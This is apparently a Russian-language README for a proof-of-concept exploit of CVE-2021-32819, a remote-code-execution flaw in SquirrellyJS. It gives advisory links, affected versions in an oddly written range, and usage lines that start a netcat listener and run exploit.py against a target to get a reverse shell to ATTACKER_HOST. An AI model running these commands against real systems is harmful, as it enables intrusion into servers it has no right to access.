
SquirrellyJS смешивает чистые данные шаблонов с опциями конфигурации движка через Express render API. Перезаписывая внутренние параметры конфигурации, можно вызвать удаленное выполнение кода в downstream-приложениях.
CVE-2021-32819 : SquirrellyJS смешивает чистые данные шаблона с параметрами конфигурации движка через API рендеринга Express. Перезаписывая внутренние параметры конфигурации, может быть вызвано удаленное выполнение кода в нижележащих приложениях.
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
v8.0.0 >= v8.0.8 Удаленное выполнение кода
Ubuntu 20.04.1
nc -lvp 443
python3 exploit.py http://example.com/ ATTACKER_HOST 443
